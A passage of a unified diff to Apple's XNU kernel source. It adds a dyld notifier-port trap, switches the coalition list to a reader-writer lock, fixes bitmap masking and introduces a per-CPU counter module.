(ipc_object_t *)&port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (rv != KERN_SUCCESS) { goto done; } @@ -302,7 +305,7 @@ done: int _kernelrpc_mach_port_get_attributes_trap(struct _kernelrpc_mach_port_get_attributes_args *args) { - task_inspect_t task = port_name_to_task_read_no_eval(args->target); + task_read_t task = port_name_to_task_read_no_eval(args->target); int rv = MACH_SEND_INVALID_DEST; mach_msg_type_number_t count; @@ -538,10 +541,8 @@ _kernelrpc_mach_port_request_notification_trap( // thread-argument-passing and its value should not be garbage current_thread()->ith_knote = ITH_KNOTE_NULL; rv = ipc_object_copyout(task->itk_space, ip_to_object(previous), - MACH_MSG_TYPE_PORT_SEND_ONCE, NULL, NULL, &previous_name); + MACH_MSG_TYPE_PORT_SEND_ONCE, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &previous_name); if (rv != KERN_SUCCESS) { - ipc_object_destroy(ip_to_object(previous), - MACH_MSG_TYPE_PORT_SEND_ONCE); goto done; } } @@ -665,3 +666,187 @@ done: ipc_voucher_release(voucher); return kr; } + +/* + * Mach Trap: task_dyld_process_info_notify_get_trap + * + * Return an array of active dyld notifier port names for current_task(). User + * is responsible for allocating the memory for the mach port names array + * and deallocating the port names inside the array returned. + * + * Does not consume any reference. + * + * Args: + * names_addr: Address for mach port names array. (In param only) + * names_count_addr: Number of active dyld notifier ports. (In-Out param) + * In: Number of slots available for copyout in caller + * Out: Actual number of ports copied out + * + * Returns: + * + * KERN_SUCCESS: A valid namesCnt is returned. (Can be zero) + * KERN_INVALID_ARGUMENT: Arguments are invalid. + * KERN_MEMORY_ERROR: Memory copyio operations failed. + * KERN_NO_SPACE: User allocated memory for port names copyout is insufficient. + * + * Other error code see task_info(). + */ +kern_return_t +task_dyld_process_info_notify_get_trap(struct task_dyld_process_info_notify_get_trap_args *args) +{ + struct task_dyld_info dyld_info; + mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT; + mach_port_name_t copyout_names[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + ipc_port_t copyout_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + uint32_t copyout_count = 0, release_count = 0, active_count = 0; + mach_vm_address_t ports_addr; /* a user space address */ + mach_port_name_t new_name; + natural_t user_names_count = 0; + ipc_port_t sright; + kern_return_t kr; + ipc_port_t *portp; + ipc_entry_t entry; + + if ((mach_port_name_array_t)args->names_addr == NULL || (natural_t *)args->names_count_addr == NULL) { + return KERN_INVALID_ARGUMENT; + } + + kr = copyin((vm_map_address_t)args->names_count_addr, &user_names_count, sizeof(natural_t)); + if (kr) { + return KERN_MEMORY_FAILURE; + } + + if (user_names_count == 0) { + return KERN_NO_SPACE; + } + + kr = task_info(current_task(), TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count); + if (kr) { + return kr; + } + + if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user32_dyld_all_image_infos, notifyMachPorts)); + } else { + ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr + + offsetof(struct user64_dyld_all_image_infos, notifyMachPorts)); + } + + lck_mtx_lock(&g_dyldinfo_mtx); + itk_lock(current_task()); + + if (current_task()->itk_dyld_notify == NULL) { + itk_unlock(current_task()); + (void)copyoutmap_atomic32(current_task()->map, MACH_PORT_NULL, (vm_map_address_t)ports_addr); /* reset magic */ + lck_mtx_unlock(&g_dyldinfo_mtx); + + kr = copyout(©out_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t)); + return kr ? KERN_MEMORY_ERROR : KERN_SUCCESS; + } + + for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) { + portp = ¤t_task()->itk_dyld_notify[slot]; + if (*portp == IPC_PORT_NULL) { + continue; + } else { + sright = ipc_port_copy_send(*portp); + if (IP_VALID(sright)) { + copyout_ports[active_count++] = sright; /* donates */ + sright = IPC_PORT_NULL; + } else { + release_ports[release_count++] = *portp; /* donates */ + *portp = IPC_PORT_NULL; + } + } + } + + task_dyld_process_info_update_helper(current_task(), active_count, + (vm_map_address_t)ports_addr, release_ports, release_count); + /* itk_lock, g_dyldinfo_mtx are unlocked upon return */ + + for (int i = 0; i < active_count; i++) { + sright = copyout_ports[i]; /* donates */ + copyout_ports[i] = IPC_PORT_NULL; + + assert(IP_VALID(sright)); + ip_reference(sright); + /* + * Below we consume each send right in copyout_ports, and if copyout_send + * succeeds, replace it with a port ref; otherwise release the port ref. + * + * We can reuse copyout_ports array for this purpose since + * copyout_count <= active_count. + */ + new_name = ipc_port_copyout_send(sright, current_space()); /* consumes */ + if (MACH_PORT_VALID(new_name)) { + copyout_names[copyout_count] = new_name; + copyout_ports[copyout_count] = sright; /* now holds port ref */ + copyout_count++; + } else { + ip_release(sright); + } + } + + assert(copyout_count <= active_count); + + if (user_names_count < copyout_count) { + kr = KERN_NO_SPACE; + goto copyout_failed; + } + + /* copyout to caller's local copy */ + kr = copyout(copyout_names, (vm_map_address_t)args->names_addr, + copyout_count * sizeof(mach_port_name_t)); + if (kr) { + kr = KERN_MEMORY_ERROR; + goto copyout_failed; + } + + kr = copyout(©out_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t)); + if (kr) { + kr = KERN_MEMORY_ERROR; + goto copyout_failed; + } + + /* now, release port refs on copyout_ports */ + for (int i = 0; i < copyout_count; i++) { + sright = copyout_ports[i]; + assert(IP_VALID(sright)); + ip_release(sright); + } + + return KERN_SUCCESS; + + +copyout_failed: + /* + * No locks are held beyond this point. + * + * Release port refs on copyout_ports, and deallocate ports that we copied out + * earlier. + */ + for (int i = 0; i < copyout_count; i++) { + sright = copyout_ports[i]; + assert(IP_VALID(sright)); + + if (ipc_right_lookup_write(current_space(), copyout_names[i], &entry)) { + /* userspace has deallocated the name we copyout */ + ip_release(sright); + continue; + } + /* space is locked and active */ + if (entry->ie_object == ip_to_object(sright) || + IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_DEAD_NAME) { + (void)ipc_right_dealloc(current_space(), copyout_names[i], entry); /* unlocks space */ + } else { + is_write_unlock(current_space()); + } + + /* space is unlocked */ + ip_release(sright); + } + + return kr; +} diff --git a/osfmk/ipc/mach_msg.c b/osfmk/ipc/mach_msg.c index 0ed0d9332..f07341365 100644 --- a/osfmk/ipc/mach_msg.c +++ b/osfmk/ipc/mach_msg.c @@ -79,7 +79,6 @@ #include #include -#include #include #include #include @@ -795,7 +794,7 @@ msg_receive_error( } } -static mach_msg_fetch_filter_policy_cbfunc_t mach_msg_fetch_filter_policy_callback = NULL; +static SECURITY_READ_ONLY_LATE(mach_msg_fetch_filter_policy_cbfunc_t) mach_msg_fetch_filter_policy_callback = NULL; kern_return_t mach_msg_filter_register_callback( diff --git a/osfmk/ipc/mach_port.c b/osfmk/ipc/mach_port.c index 2c0a4d854..deaa574ac 100644 --- a/osfmk/ipc/mach_port.c +++ b/osfmk/ipc/mach_port.c @@ -80,7 +80,6 @@ #include #include #include -#include #include #include #include @@ -1844,7 +1843,8 @@ mach_port_extract_right( } kr = ipc_object_copyin(space, name, msgt_name, (ipc_object_t *) poly, 0, NULL, - IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (space == current_space() && msgt_name == MACH_MSG_TYPE_COPY_SEND) ? + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND : IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND); if (kr == KERN_SUCCESS) { *polyPoly = ipc_object_copyin_type(msgt_name); @@ -2473,6 +2473,30 @@ mach_port_guard_exception( thread_guard_violation(t, code, subcode, fatal); } +/* + * Temporary wrapper for immovable mach port guard exception. + * + * Condition: !(ip_is_control(port) && !immovable_control_port_enabled) + */ +void +mach_port_guard_exception_immovable( + mach_port_name_t name, + mach_port_t port, + uint64_t portguard) +{ + if (ip_is_control(port) && immovable_control_port_enabled) { + mach_port_guard_exception(name, 0, portguard, + ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD ? + kGUARD_EXC_IMMOVABLE : kGUARD_EXC_IMMOVABLE_NON_FATAL); + } else if (!ip_is_control(port)) { + /* always fatal exception for non-control port violation */ + mach_port_guard_exception(name, 0, portguard, kGUARD_EXC_IMMOVABLE); + } else { + /* ip_is_control(port) && !immovable_control_port_enabled */ + panic("mach_port_guard_exception_immovable: condition does not hold."); + } +} + /* * Routine: mach_port_guard_ast diff --git a/osfmk/ipc/port.h b/osfmk/ipc/port.h index 5b24a9885..852a850b5 100644 --- a/osfmk/ipc/port.h +++ b/osfmk/ipc/port.h @@ -92,6 +92,11 @@ extern void mach_port_guard_exception( uint64_t inguard, uint64_t portguard, unsigned reason); + +extern void mach_port_guard_exception_immovable( + mach_port_name_t name, + mach_port_t port, + uint64_t portguard); __END_DECLS #endif /* _IPC_PORT_H_ */ diff --git a/osfmk/kdp/kdp_dyld.h b/osfmk/kdp/kdp_dyld.h index 289c5d4d0..ecfaf24dc 100644 --- a/osfmk/kdp/kdp_dyld.h +++ b/osfmk/kdp/kdp_dyld.h @@ -35,6 +35,9 @@ #define DYLD_ALL_IMAGE_INFOS_ADDRESS_MINIMUM_VERSION 9 #define DYLD_ALL_IMAGE_INFOS_TIMESTAMP_MINIMUM_VERSION 15 +#define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8 +#define DYLD_PROCESS_INFO_NOTIFY_MAGIC 0x49414E46 + /* Re-use dyld format for kext load addresses */ #if __LP64__ typedef struct user64_dyld_uuid_info kernel_uuid_info; @@ -90,7 +93,9 @@ struct user32_dyld_all_image_infos { /* the following field is only in version 15 (Mac OS X 10.12, iOS 10.0) and later */ user32_addr_t sharedCacheBaseAddress; uint64_t timestamp; - user32_addr_t reserved[14]; + user32_addr_t dyldpath; + mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + user32_addr_t reserved[5]; /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */ user32_addr_t compact_dyld_image_info_addr; user32_size_t compact_dyld_image_info_size; @@ -128,7 +133,9 @@ struct user64_dyld_all_image_infos { /* the following field is only in version 15 (macOS 10.12, iOS 10.0) and later */ user64_addr_t sharedCacheBaseAddress; uint64_t timestamp; - user64_addr_t reserved[14]; + user64_addr_t dyldPath; + mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT]; + user64_addr_t reserved[9]; /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */ user64_addr_t compact_dyld_image_info_addr; user64_size_t compact_dyld_image_info_size; diff --git a/osfmk/kdp/ml/arm/kdp_machdep.c b/osfmk/kdp/ml/arm/kdp_machdep.c index 42b755900..2ef4d343d 100644 --- a/osfmk/kdp/ml/arm/kdp_machdep.c +++ b/osfmk/kdp/ml/arm/kdp_machdep.c @@ -623,21 +623,30 @@ machine_trace_thread64(thread_t thread, pc = get_saved_state_pc(state); sp = get_saved_state_sp(state); } else { - /* kstackptr may not always be there, so recompute it */ - struct arm_kernel_saved_state * state = &thread_get_kernel_state(thread)->machine.ss; - stacklimit = VM_MAX_KERNEL_ADDRESS; - stacklimit_bottom = VM_MIN_KERNEL_ADDRESS; - bt_vm_map = kernel_map; + struct arm_saved_state *state = thread->machine.kpcb; + if (state != NULL) { + if (fp == 0) { + fp = state->ss_64.fp; + } - /* Get the frame pointer */ - if (fp == 0) { - fp = state->fp; + prevlr = state->ss_64.lr; + pc = state->ss_64.pc; + sp = state->ss_64.sp; + } else { + /* kstackptr may not always be there, so recompute it */ + arm_kernel_saved_state_t *kstate = &thread_get_kernel_state(thread)->machine.ss; + + if (fp == 0) { + fp = kstate->fp; + } + prevlr = kstate->lr; + pc = kstate->pc; + sp = kstate->sp; } - /* Fill in the current link register */ - prevlr = state->lr; - pc = state->pc; - sp = state->sp; + stacklimit = VM_MAX_KERNEL_ADDRESS; + stacklimit_bottom = VM_MIN_KERNEL_ADDRESS; + bt_vm_map = kernel_map; } if (!user_p && !prevlr && !fp && !sp && !pc) { diff --git a/osfmk/kern/Makefile b/osfmk/kern/Makefile index 7d2ddfc5e..42da7337b 100644 --- a/osfmk/kern/Makefile +++ b/osfmk/kern/Makefile @@ -39,10 +39,12 @@ EXPORT_FILES = \ circle_queue.h \ clock.h \ coalition.h \ + counter.h \ cpu_number.h \ cpu_data.h \ energy_perf.h \ extmod_statistics.h \ + hv_io_notifier.h \ hv_support.h \ hv_support_kext.h \ ipc_mig.h \ @@ -56,6 +58,7 @@ EXPORT_FILES = \ locks.h \ lock_group.h \ host.h \ + hvg_hypercall.h \ mach_param.h \ macro_help.h \ mpqueue.h \ diff --git a/osfmk/kern/ast.c b/osfmk/kern/ast.c index d0e341529..0c38b3a26 100644 --- a/osfmk/kern/ast.c +++ b/osfmk/kern/ast.c @@ -55,7 +55,7 @@ */ #include -#include +#include #include #include #include @@ -132,8 +132,6 @@ ast_taken_kernel(void) assert(urgent_reason & AST_PREEMPT); - counter(c_ast_taken_block++); - thread_block_reason(THREAD_CONTINUE_NULL, NULL, urgent_reason); assert(ml_get_interrupts_enabled() == FALSE); @@ -311,7 +309,6 @@ ast_taken_user(void) #endif if (preemption_reasons & AST_PREEMPT) { - counter(c_ast_taken_block++); /* switching to a continuation implicitly re-enables interrupts */ thread_block_reason(thread_preempted, NULL, preemption_reasons); /* NOTREACHED */ diff --git a/osfmk/kern/audit_sessionport.c b/osfmk/kern/audit_sessionport.c index 991941f57..62b671d9e 100644 --- a/osfmk/kern/audit_sessionport.c +++ b/osfmk/kern/audit_sessionport.c @@ -59,7 +59,7 @@ audit_session_mksend(struct auditinfo_addr *aia_p, ipc_port_t *sessionport) { audit_session_aiaref(aia_p); if (!ipc_kobject_make_send_lazy_alloc_port(sessionport, - (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, false, 0)) { + (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, IPC_KOBJECT_ALLOC_NONE, false, 0)) { audit_session_aiaunref(aia_p); } diff --git a/osfmk/kern/bits.h b/osfmk/kern/bits.h index 89012eb5a..045ed9621 100644 --- a/osfmk/kern/bits.h +++ b/osfmk/kern/bits.h @@ -312,9 +312,17 @@ bitmap_first(bitmap_t *map, uint nbits) inline static void bitmap_not(bitmap_t *out, const bitmap_t *in, uint nbits) { - for (uint i = 0; i <= bitmap_index(nbits - 1); i++) { + uint i; + + for (i = 0; i < bitmap_index(nbits - 1); i++) { out[i] = ~in[i]; } + + uint nbits_complete = i * 64; + + if (nbits > nbits_complete) { + out[i] = ~in[i] & mask(nbits - nbits_complete); + } } inline static void @@ -328,9 +336,17 @@ bitmap_and(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits) inline static void bitmap_and_not(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits) { - for (uint i = 0; i <= bitmap_index(nbits - 1); i++) { + uint i; + + for (i = 0; i < bitmap_index(nbits - 1); i++) { out[i] = in1[i] & ~in2[i]; } + + uint nbits_complete = i * 64; + + if (nbits > nbits_complete) { + out[i] = (in1[i] & ~in2[i]) & mask(nbits - nbits_complete); + } } inline static bool diff --git a/osfmk/kern/bsd_kern.c b/osfmk/kern/bsd_kern.c index cb46e621b..aafd71301 100644 --- a/osfmk/kern/bsd_kern.c +++ b/osfmk/kern/bsd_kern.c @@ -324,7 +324,7 @@ get_task_map_reference(task_t t) return VM_MAP_NULL; } m = t->map; - vm_map_reference_swap(m); + vm_map_reference(m); task_unlock(t); return m; } @@ -768,6 +768,12 @@ get_vmmap_size( { return vm_map_adjusted_size(map); } +int +get_task_page_size( + task_t task) +{ + return vm_map_page_size(task->map); +} #if CONFIG_COREDUMP @@ -1016,7 +1022,7 @@ fill_taskprocinfo(task_t task, struct proc_taskinfo_internal * ptinfo) ptinfo->pti_threads_system = tinfo.threads_system; ptinfo->pti_threads_user = tinfo.threads_user; - ptinfo->pti_faults = task->faults; + ptinfo->pti_faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX); ptinfo->pti_pageins = task->pageins; ptinfo->pti_cow_faults = task->cow_faults; ptinfo->pti_messages_sent = task->messages_sent; diff --git a/osfmk/kern/coalition.c b/osfmk/kern/coalition.c index e77ca4e68..af789e0b2 100644 --- a/osfmk/kern/coalition.c +++ b/osfmk/kern/coalition.c @@ -89,7 +89,7 @@ int merge_adaptive_coalitions; LCK_GRP_DECLARE(coalitions_lck_grp, "coalition"); /* coalitions_list_lock protects coalition_count, coalitions queue, next_coalition_id. */ -static LCK_MTX_DECLARE(coalitions_list_lock, &coalitions_lck_grp); +static LCK_RW_DECLARE(coalitions_list_lock, &coalitions_lck_grp); static uint64_t coalition_count; static uint64_t coalition_next_id = 1; static queue_head_t coalitions_q; @@ -1198,7 +1198,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t lck_mtx_init(&new_coal->lock, &coalitions_lck_grp, LCK_ATTR_NULL); - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_exclusive(&coalitions_list_lock); new_coal->id = coalition_next_id++; coalition_count++; enqueue_tail(&coalitions_q, &new_coal->coalitions); @@ -1215,7 +1215,7 @@ coalition_create_internal(int type, int role, boolean_t privileged, coalition_t #endif cid = new_coal->id; ctype = new_coal->type; - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_exclusive(&coalitions_list_lock); coal_dbg("id:%llu, type:%s", cid, coal_type_str(ctype)); @@ -1281,22 +1281,29 @@ coalition_release(coalition_t coal) * coalition_find_by_id_internal * Returns: Coalition object with specified id, NOT referenced. * If not found, returns COALITION_NULL. - * Condition: coalitions_list_lock must be LOCKED. + * If found, returns a locked coalition. + * + * Condition: No locks held */ static coalition_t coalition_find_by_id_internal(uint64_t coal_id) { + coalition_t coal; + if (coal_id == 0) { return COALITION_NULL; } - lck_mtx_assert(&coalitions_list_lock, LCK_MTX_ASSERT_OWNED); - coalition_t coal; + lck_rw_lock_shared(&coalitions_list_lock); qe_foreach_element(coal, &coalitions_q, coalitions) { if (coal->id == coal_id) { + coalition_lock(coal); + lck_rw_unlock_shared(&coalitions_list_lock); return coal; } } + lck_rw_unlock_shared(&coalitions_list_lock); + return COALITION_NULL; } @@ -1308,23 +1315,16 @@ coalition_find_by_id_internal(uint64_t coal_id) coalition_t coalition_find_by_id(uint64_t cid) { - if (cid == 0) { - return COALITION_NULL; - } - - lck_mtx_lock(&coalitions_list_lock); - coalition_t coal = coalition_find_by_id_internal(cid); + if (coal == COALITION_NULL) { - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } - coalition_lock(coal); + /* coal is locked */ if (coal->reaped) { coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } @@ -1338,7 +1338,6 @@ coalition_find_by_id(uint64_t cid) #endif coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); coal_dbg("id:%llu type:%s ref_count:%u", coal->id, coal_type_str(coal->type), rc); @@ -1357,25 +1356,18 @@ coalition_find_by_id(uint64_t cid) coalition_t coalition_find_and_activate_by_id(uint64_t cid) { - if (cid == 0) { - return COALITION_NULL; - } - - lck_mtx_lock(&coalitions_list_lock); - coalition_t coal = coalition_find_by_id_internal(cid); + if (coal == COALITION_NULL) { - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } - coalition_lock(coal); + /* coal is locked */ if (coal->reaped || coal->terminated) { /* Too late to put something new into this coalition, it's * already on its way out the door */ coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); return COALITION_NULL; } @@ -1393,7 +1385,6 @@ coalition_find_and_activate_by_id(uint64_t cid) #endif coalition_unlock(coal); - lck_mtx_unlock(&coalitions_list_lock); coal_dbg("id:%llu type:%s ref_count:%u, active_count:%u", coal->id, coal_type_str(coal->type), rc, ac); @@ -2003,10 +1994,10 @@ coalition_reap_internal(coalition_t coal) coalition_unlock(coal); - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_exclusive(&coalitions_list_lock); coalition_count--; remqueue(&coal->coalitions); - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_exclusive(&coalitions_list_lock); /* Release the list's reference and launchd's reference. */ coalition_release(coal); @@ -2116,7 +2107,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz) int ncoals = 0; struct coalition *coal; - lck_mtx_lock(&coalitions_list_lock); + lck_rw_lock_shared(&coalitions_list_lock); qe_foreach_element(coal, &coalitions_q, coalitions) { if (!coal->reaped && (type < 0 || type == (int)coal->type)) { if (coal_list && ncoals < list_sz) { @@ -2125,7 +2116,7 @@ coalitions_get_list(int type, struct procinfo_coalinfo *coal_list, int list_sz) ++ncoals; } } - lck_mtx_unlock(&coalitions_list_lock); + lck_rw_unlock_shared(&coalitions_list_lock); return ncoals; } diff --git a/osfmk/kern/counter.h b/osfmk/kern/counter.h new file mode 100644 index 000000000..f7a43fa48 --- /dev/null +++ b/osfmk/kern/counter.h @@ -0,0 +1,231 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ +#ifdef XNU_KERNEL_PRIVATE + +#ifndef _KERN_COUNTER_H +#define _KERN_COUNTER_H + +/*! + * @file + * + * @brief + * Module for working with 64bit relaxed atomic counters. + * + * @discussion + * Different counter types have different speed-memory tradeoffs, but + * they all share a common interface. + * + * Counters can be statically allocated or dynamically allocated. + * + * Statically allocated counters are always backed by per-cpu storage which means + * writes take place on the current CPUs value and reads sum all of the per-cpu values. + * + * Dynamically allocated counters can be either per-cpu or use a single 64bit value. + * To create a per-cpu counter, use the scalable_counter_t type. Note that this + * trades of additional memory for better scalability. + * To create a single 64bit counter, use the atomic_counter_t type. + * + * For most counters you can just use the counter_t type and the choice of + * scalable or atomic will be made at compile time based on the target. + * + * The counter types are opaque handles. They ARE NOT COPYABLE. If you need + * to make a copy of a counter, you should do so like this: + * + * counter_t original; + * ... + * counter_t copy; + * counter_alloc(©); + * counter_add(©, counter_load(&original)); + * ... + * // Make sure to free them at some point. + * counter_free(&original); + * counter_free(©); + * + * + * Static counter example: + * + * SCALABLE_COUNTER_DEFINE(my_counter); + * ... + * counter_inc(&my_counter); + * assert(counter_load(&my_counter) == 1); + * + * + * Dynamic Counter Example: + * + * scalable_counter_t my_percpu_counter; + * atomic_counter_t my_atomic_counter; + * counter_t my_counter; + * + * // All three counters share the same interface. So to change the speed-memory + * // tradeoff just change the type. + * counter_init(&my_scalable_counter); + * counter_init(&my_atomic_counter); + * counter_init(&my_counter); + * + * counter_inc(&my_scalable_counter); + * counter_inc(&my_atomic_counter); + * counter_inc(&my_counter); + * + * assert(counter_load(&my_scalable_counter) == 1); + * assert(counter_load(&my_atomic_counter) == 1); + * assert(counter_load(&my_counter) == 1); + * + */ + +#include +#include +#include +#include + +typedef __zpercpu uint64_t *scalable_counter_t; +typedef uint64_t atomic_counter_t; +/* Generic counter base type. Does not have an implementation. */ +struct generic_counter_t; + +/*! + * @macro SCALABLE_COUNTER_DECLARE + * + * @abstract + * (optionally) declares a static per-cpu counter (in a header). + * + * @param var the name of the counter. + */ +#define SCALABLE_COUNTER_DECLARE(name) \ + extern scalable_counter_t name; + +/*! + * @macro SCALABLE_COUNTER_DEFINE + * + * @abstract + * Defines a static per-cpu counter. + * Counter can only be accessed after the TUNABLES phase of startup. + * + * @param var the name of the counter. + */ +#define SCALABLE_COUNTER_DEFINE(name) \ + __startup_data uint64_t __ ##name##_early_storage = 0; \ + scalable_counter_t name = {&__##name##_early_storage}; \ + STARTUP_ARG(TUNABLES, STARTUP_RANK_MIDDLE, scalable_counter_static_boot_mangle, &name); \ + STARTUP_ARG(PERCPU, STARTUP_RANK_SECOND, scalable_counter_static_init, &name); + +/* + * Initialize a per-cpu counter. + * May block and will never fail. + * This counter must be freed with counter_free. + */ +OS_OVERLOADABLE +extern void counter_alloc(struct generic_counter_t *); + +OS_OVERLOADABLE +extern void counter_free(struct generic_counter_t *); +/* + * Add amount to counter. + * @param amount: The amount to add. + */ +OS_OVERLOADABLE +extern void counter_add(struct generic_counter_t *, uint64_t amount); + +/* + * Add 1 to this counter. + */ +OS_OVERLOADABLE +extern void counter_inc(struct generic_counter_t *); + +/* + * Subtract 1 from this counter. + */ +OS_OVERLOADABLE +extern void counter_dec(struct generic_counter_t *); + +/* Variants of the above operations where the caller takes responsibility for disabling preemption. */ +OS_OVERLOADABLE +extern void counter_add_preemption_disabled(struct generic_counter_t *, uint64_t amount); +OS_OVERLOADABLE +extern void counter_inc_preemption_disabled(struct generic_counter_t *); +OS_OVERLOADABLE +extern void counter_dec_preemption_disabled(struct generic_counter_t *); + +/* + * Read the value of the percpu counter. + * Note that this will cause synchronization of all the sharded values. + */ +OS_OVERLOADABLE +extern uint64_t counter_load(struct generic_counter_t *); + +#pragma mark implementation details +/* NB: Nothing below here should be used directly. */ + +__startup_func void scalable_counter_static_boot_mangle(scalable_counter_t *counter); +__startup_func void scalable_counter_static_init(scalable_counter_t *counter); + +#if XNU_TARGET_OS_WATCH || XNU_TARGET_OS_TV +#define ATOMIC_COUNTER_USE_PERCPU 0 +#else +#define ATOMIC_COUNTER_USE_PERCPU 1 +#endif /* XNU_TARGET_OS_OSX */ + +#if ATOMIC_COUNTER_USE_PERCPU +typedef scalable_counter_t counter_t; +#else +typedef atomic_counter_t counter_t; +#endif /* ATOMIC_COUNTER_USE_PERCPU */ + +#define COUNTER_MAKE_PROTOTYPES(counter_t) \ +OS_OVERLOADABLE \ +extern void counter_alloc(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_free(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_add(counter_t *, uint64_t amount); \ + \ +OS_OVERLOADABLE \ +extern void counter_inc(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_dec(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_add_preemption_disabled(counter_t *, uint64_t amount); \ + \ +OS_OVERLOADABLE \ +extern void counter_inc_preemption_disabled(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern void counter_dec_preemption_disabled(counter_t *); \ + \ +OS_OVERLOADABLE \ +extern uint64_t counter_load(counter_t *); + +COUNTER_MAKE_PROTOTYPES(scalable_counter_t); +COUNTER_MAKE_PROTOTYPES(atomic_counter_t); + +#endif /* _KERN_COUNTER_H */ + +#endif /* XNU_KERNEL_PRIVATE */ diff --git a/osfmk/kern/counter_common.c b/osfmk/kern/counter_common.c new file mode 100644 index 000000000..9b1213273 --- /dev/null +++ b/osfmk/kern/counter_common.c @@ -0,0 +1,165 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +SECURITY_READ_ONLY_LATE(zone_t) counters_zone; +ZONE_INIT(&counters_zone, "per_cpu_counters", sizeof(uint64_t), + ZC_PERCPU | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, NULL); + +/* + * Tracks how many static scalable counters are in use since they won't show up + * in the per_cpu_counters zone stats. + */ +uint64_t num_static_scalable_counters; + +/* + * Mangle the given scalable_counter_t so that it points to the early storage + * regardless of which CPU # we're boot on. + * Must be run before we go multi-core. + */ +__startup_func void +scalable_counter_static_boot_mangle(scalable_counter_t *counter) +{ + *counter = __zpcpu_mangle_for_boot(*counter); +} + +/* + * Initializes a static counter in permanent per-cpu memory. + * Run during startup for each static per-cpu counter + * Must be run before we go multi-core. + */ +__startup_func void 